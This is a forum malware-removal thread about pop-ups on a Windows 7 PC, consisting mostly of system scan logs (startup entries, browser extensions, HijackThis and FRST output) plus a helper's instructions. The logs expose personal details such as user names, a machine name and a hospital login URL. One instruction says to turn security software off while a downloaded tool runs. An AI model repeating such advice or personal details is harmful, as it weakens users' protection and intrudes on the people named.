2015-01-17 04:21:02   --------   d-s---w-   C:\Users\Admin\AppData\Roaming\Microsoft
2015-01-17 04:21:02   --------   d-----w-   C:\Users\Admin\AppData\Roaming\Media Center Programs
2015-01-17 04:21:02   --------   d-----w-   C:\Users\Admin\AppData\Local\Temp
2015-01-17 04:21:02   --------   d-----w-   C:\Users\Admin\AppData\Local\Microsoft Help
2015-01-17 04:21:02   --------   d-----w-   C:\Users\Admin\AppData\Local\Microsoft
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
====== C:\Users\Admin ======
2015-01-22 07:02:22   0DD7CD28C36F909EF7EE0C8628D687F3   37987520   ----a-w-   C:\Users\Admin\Desktop\Windows-KB890830-x64-V5.20.exe
2015-01-22 06:50:44   B9E1BF24EF01A82701B09BE75D294085   1707939   ----a-w-   C:\Users\Admin\Desktop\JRT.exe
2015-01-22 05:28:21   --------   d-----r-   C:\Users\Admin\Searches
2015-01-22 05:28:12   --------   d-----r-   C:\Users\Admin\Contacts
2015-01-21 06:30:15   --------   d-----w-   C:\ProgramData\RogueKiller
2015-01-19 18:13:20   --------   d-----w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ERUNT
2015-01-17 04:21:02   6FC234AD3752E1267B34FB12BCD6718B   20   --sh--w-   C:\Users\Admin\ntuser.ini
2015-01-17 04:21:02   --------   d--h--w-   C:\Users\Admin\AppData
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Videos
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Saved Games
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Pictures
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Music
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Links
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Favorites
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Downloads
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Documents
2015-01-17 04:21:02   --------   d-----r-   C:\Users\Admin\Desktop
2015-01-07 16:57:55   --------   d-----w-   C:\ProgramData\pnikjcemimhgahpjiapnjbejoigfkjcj

====== C: exe-files ==
=== C: other files ==

==== Startup Registry Enabled ======================

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="%ProgramFiles%\Windows\Sidebar.exe /autoRun"

[HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Windows\CurrentVersion\Run]
"Sidebar"="C:\Program Files\Windows Sidebar\sidebar.exe /autoRun"
"ISUSPM"="C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe -scheduler"
"OfficeSyncProcess"="C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE"
"Spotify Web Helper"="C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"mctadmin"="C:\Windows\System32\mctadmin.exe"

[HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\RunOnce]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Norton Online Backup"="C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe"
"StartCCC"="C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe MSRun"
"RemoteControl10"="C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
"Hotkey Utility"="C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe"
"BCSSync"="C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe /DelayServices"
"APSDaemon"="C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
"iTunesHelper"="C:\Program Files (x86)\iTunes\iTunesHelper.exe"
"IndexSearch"="C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe"
"PaperPort PTD"="C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe"
"PPort12reminder"="C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe -r C:\ProgramData\ScanSoft\PaperPort\12\Config\Ereg\Ereg.ini"
"PDFHook"="C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe"
"PDF5 Registry Controller"="C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe"
"ControlCenter4"="C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe /autorun"
"BrStsMon00"="C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN"

==== Startup Registry Enabled x64 ======================

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s"

==== Startup Folders ======================

2012-12-03 03:10:16   1147   ----a-w-   C:\Users\Bonnie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
2012-05-29 13:10:36   1949   ----a-w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk
2012-11-14 01:53:57   1192   ----a-w-   C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ImageBrowser EX Agent.lnk

==== Task Scheduler Jobs ======================

C:\Windows\tasks\Adobe Flash Player Updater.job --a------ C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [01/14/2015 11:56 PM]

==== Other Scheduled Tasks ======================

"C:\Windows\SysNative\tasks\Adobe Acrobat Update Task" [C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe]
"C:\Windows\SysNative\tasks\Adobe ARM" ["C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"]
"C:\Windows\SysNative\tasks\Adobe Flash Player Updater" [C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe]
"C:\Windows\SysNative\tasks\Adobe Reader Speed Launcher" ["C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Reader_sl.exe"]
"C:\Windows\SysNative\tasks\DeviceDetector" [C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskUserS-1-5-21-2977827394-2594518940-965070511-1000Core" [C:\Users\Bonnie\AppData\Local\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\GoogleUpdateTaskUserS-1-5-21-2977827394-2594518940-965070511-1000UA" [C:\Users\Bonnie\AppData\Local\Google\Update\GoogleUpdate.exe]
"C:\Windows\SysNative\tasks\NBAgent" [C:\Program Files (x86)\Nero\Nero 10\Nero BackItUp\NBAgent.exe]
"C:\Windows\SysNative\tasks\Norton WSC Integration" ["C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\WSCStub.exe"]
"C:\Windows\SysNative\tasks\Apple\AppleSoftwareUpdate" [C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe]
"C:\Windows\SysNative\tasks\Norton Internet Security\Norton Error Analyzer" [C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\SymErr.exe]
"C:\Windows\SysNative\tasks\Norton Internet Security\Norton Error Processor" [C:\Program Files (x86)\Norton Internet Security\Engine\19.9.1.14\SymErr.exe]
"C:\Windows\SysNative\tasks\OfficeSoftwareProtectionPlatform\SvcRestartTask" [%systemroot%\system32\sc.exe start osppsvc]

==== Firefox Start and Search pages ======================

ProfilePath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

ProfilePath: C:\Users\Bonnie\AppData\Roaming\Mozilla\Firefox\Profiles\7rgneeol.default
user_pref("browser.startup.homepage", "about:home");
user_pref("browser.newtab.url", "about:newtab");

==== Firefox Extensions Registry ======================

[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Mozilla\Firefox\Extensions]
"online_banking@kaspersky.com"="C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com" [12/17/2014 09:51 AM]

==== Firefox Extensions ======================

AppDir: C:\Program Files (x86)\Mozilla Firefox
- Default - %AppDir%\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

==== Firefox Plugins ======================

Profilepath: C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\p7xuz79o.default
8560995C727974F27F2A1CE68909FEB9   - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_257.dll -   Shockwave Flash


==== Chromium Look ======================

HKEY_LOCAL_MACHINE\SOFTWARE\Google\Chrome\Extensions
blbkdnmdcafmfhinpmnlhhddbepgkeaa - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa[]
dchlnpcodkpfdpacogkljefecpegganj - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx[10/08/2013 01:50 PM]
hakdifolhalapjijoafobooafbilfakh - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\online_banking_chrome.crx[10/08/2013 01:50 PM]
hghkgaeecgjhjkannahfamoehjmkjail - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\content_blocker_chrome.crx[10/08/2013 01:50 PM]
jagncdcchgajhfhijbbhecadmaiegcmh - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\virtkbd.crx[12/17/2014 09:49 AM]
mgekkbflbjgdcmbphhpaikbmjbifkaib - C:\Users\Bonnie\AppData\Local\CRE\mgekkbflbjgdcmbphhpaikbmjbifkaib.crx[]
pjldcfjmnllhmgjclecdnfampinooman - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx[10/08/2013 01:50 PM]

Kaspersky Protection - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blbkdnmdcafmfhinpmnlhhddbepgkeaa
YouTube - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo
Google Search - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf
Kaspersky URL Advisor - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchlnpcodkpfdpacogkljefecpegganj
Safe Money - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\hakdifolhalapjijoafobooafbilfakh
Dangerous Websites Blocker - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\hghkgaeecgjhjkannahfamoehjmkjail
shopndrop - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jggpdnkhlpbjdkpkhcnbmcjedfgnbdek
Google Wallet - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
Gmail - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia
Anti-Banner - Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjldcfjmnllhmgjclecdnfampinooman

==== Chromium Startpages ======================

C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Preferences
"homepage": "http://partnerpage.google.com/bridgemail.com",
"startup_urls": [ "http://www.google.com/", "http://lds.org/" ],


==== Chromium Fix ======================

C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Local Storage\https_static.selectgo00.selectgo.net_0.localstorage deleted successfully
C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Extensions\jggpdnkhlpbjdkpkhcnbmcjedfgnbdek deleted successfully

==== Set IE to Default ======================

Old Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://go.microsoft.com/fwlink/p/?LinkId=255141"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="www.google.com"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="www.google.com"

New Values:
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://go.microsoft.com/fwlink/p/?LinkId=255141"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\AboutURLs]
"Tabs"="res://ieframe.dll/tabswelcome.htm"

==== All HKCU SearchScopes ======================

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchScopes
"DefaultScope"="{0633EE93-D776-472f-A0FF-E1416B8B2E3A}"
{012E1000-F331-11DB-8314-0800200C9A66} Google  Url="http://www.google.com/search?q={searchTerms}"
{0633EE93-D776-472f-A0FF-E1416B8B2E3A} Bing  Url="http://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE8SRC"
{6A1806CD-94D4-4689-BA73-E35EA1EA9990} Unknown  Url="Not_Found"

==== Reset Google Chrome ======================

C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Preferences was reset successfully
C:\Users\Bonnie\AppData\Local\Google\Chrome\User Data\Default\Web Data was reset successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-2977827394-2594518940-965070511-1008\Software\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} deleted successfully

==== Deleting CLSID Registry Values ======================


==== Deleting Registry Keys ======================

HKEY_LOCAL_MACHINE\Software\wow6432node\Policies\Google deleted successfully
HKEY_LOCAL_MACHINE\SOFTWARE\wow6432node\Google\Chrome\Extensions\mgekkbflbjgdcmbphhpaikbmjbifkaib deleted successfully

==== HijackThis Entries ======================

F2 - REG:system.ini: UserInit=userinit.exe,
O2 - BHO: PlusIEEventHelper Class - {551A852F-39A6-44A7-9C13-AFBEC9185A9D} - C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll
O2 - BHO: ContentBlockerBrowserHelperObject - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~2\MICROS~4\Office14\GROOVEEX.DLL
O2 - BHO: VirtualKeyboardBrowserHelperObject - {73455575-E40C-433C-9784-C78DC7761455} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O2 - BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Safe Money Plugin - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll
O2 - BHO: URLRedirectionBHO - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\PROGRA~2\MICROS~4\Office14\URLREDIR.DLL
O2 - BHO: link filter bho - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll
O4 - HKLM\..\Run: [Norton Online Backup] C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [RemoteControl10] "C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe"
O4 - HKLM\..\Run: [Hotkey Utility] C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
O4 - HKLM\..\Run: [BCSSync] "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [IndexSearch] "C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe"
O4 - HKLM\..\Run: [PaperPort PTD] "C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe"
O4 - HKLM\..\Run: [PPort12reminder] "C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe" -r "C:\ProgramData\ScanSoft\PaperPort\12\Config\Ereg\Ereg.ini"
O4 - HKLM\..\Run: [PDFHook] C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe
O4 - HKLM\..\Run: [PDF5 Registry Controller] C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe
O4 - HKLM\..\Run: [ControlCenter4] C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe /autorun
O4 - HKLM\..\Run: [BrStsMon00] C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe /AUTORUN
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /autoRun (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-20\..\RunOnce: [mctadmin] C:\Windows\System32\mctadmin.exe (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-21-2977827394-2594518940-965070511-1000\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun (User 'Bonnie')
O4 - HKUS\S-1-5-18\..\RunOnce: [SpUninstallDeleteDir] rmdir /s /q "\SearchProtect" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\RunOnce: [SpUninstallDeleteDir] rmdir /s /q "\SearchProtect" (User 'Default user')
O4 - S-1-5-21-2977827394-2594518940-965070511-1000 Startup: Dropbox.lnk = Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe (User 'Bonnie')
O4 - S-1-5-21-2977827394-2594518940-965070511-1000 User Startup: Dropbox.lnk = Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe (User 'Bonnie')
O4 - Global Startup: Event Reminder.lnk = C:\Program Files (x86)\The Print Shop 23.1\Remind.exe
O4 - Global Startup: ImageBrowser EX Agent.lnk = C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
O8 - Extra context menu item: Add to Anti-Banner - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ie_banner_deny.htm
O9 - Extra button: Virtual Keyboard - {0C4CC089-D306-440D-9772-464E226F6539} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll
O9 - Extra button: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1004 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: @C:\Program Files (x86)\Windows Live\Writer\WindowsLiveWriterShortcuts.dll,-1003 - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files (x86)\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: Se&nd to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIE.dll
O9 - Extra button: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra 'Tools' menuitem: OneNote Lin&ked Notes - {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - C:\Program Files (x86)\Microsoft Office\Office14\ONBttnIELinkedNotes.dll
O9 - Extra button: URLs check - {CCF151D8-D089-449F-A5A4-D9909053F20F} - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O10 - Unknown file in Winsock LSP: c:\program files (x86)\common files\microsoft shared\windows live\wlidnsp.dll
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O16 - DPF: {E4D88471-7ED7-43E1-B290-205559E8EBB2} (logoff Class) - https://my.madisonhospital.org/mig/mae/login/Browser%20Logoff.dll
O16 - DPF: {ECB7BFF0-FF65-11D1-9004-00A0C92E6878} (WebEnable Class) - https://my.madisonhospital.org/mig/mae/login/MWebEnable.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: NameServer = 8.8.8.8
O17 - HKLM\System\CCS\Services\Tcpip\..\{39C34F84-4F8F-431C-AA97-5BDA129281FC}: NameServer = 8.8.8.8
O17 - HKLM\System\CS1\Services\Tcpip\..\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: NameServer = 8.8.8.8
O17 - HKLM\System\CS2\Services\Tcpip\..\{18BAEE32-7A7F-4151-B2E3-CD66400E704F}: NameServer = 8.8.8.8
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - C:\Program Files (x86)\Windows Live\Photo Gallery\AlbumDownloadProtocolHandler.dll
O18 - Filter hijack: text/xml - {807573E5-5146-11D5-A672-00B0D022E945} - C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE14\MSOXMLMF.DLL
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\Windows\System32\alg.exe (file missing)
O23 - Service: AMD External Events Utility - Unknown owner - C:\Windows\system32\atiesrxx.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: Kaspersky Anti-Virus Service (AVP) - Kaspersky Lab ZAO - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: BrYNSvc - Brother In

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #8 on: January 23, 2015, 08:48:05 AM »
Thanks for those logs, run another scan with FRST, see what the system looks like now...

Open FRST, make sure all boxes are checkmarked under "Whitelist", and also make sure only Addition.txt is checkmarked under "Optional scan".

Post the two fresh logs...

Next,

Download Security Check by screen317 from either of the following:

http://screen317.spywareinfoforum.org/SecurityCheck.exe or http://screen317.changelog.fr/SecurityCheck.exe

Save it to your Desktop. (If your security alerts, either accept the alert or turn the security off while Security Check runs.)
Double click SecurityCheck.exe (Vista or Windows 7/8 users right click and select "Run as Administrator") and follow the onscreen instructions inside of the black box. Press any key when asked.
A Notepad document should open automatically called checkup.txt; please post the contents of that document.

If Security Check will not run or you get an alert saying it is not supported, reboot your PC, then try again...

Let me see those logs in your next reply, also give an update on any remaining issues or concerns....

Thank you,

Kevin...

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #9 on: January 23, 2015, 07:35:33 PM »
Things are looking a lot better! Thanks!

Here are the logs (checkup log in next post):

FRST:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 19-01-2015
Ran by Admin (administrator) on LAWRENCE2 on 23-01-2015 18:12:07
Running from C:\Users\Admin\Desktop
Loaded Profiles: Bonnie & Admin (Available profiles: Bonnie & Admin)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Acer Incorporated) C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Acer Incorporated) C:\Program Files\Gateway\Gateway Updater\UpdaterService.exe
(Microsoft Corporation) C:\Windows\System32\msiexec.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Spotify Ltd) C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
() C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
() C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Dropbox, Inc.) C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\wmi64.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10060320 2010-02-09] (Realtek Semiconductor)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
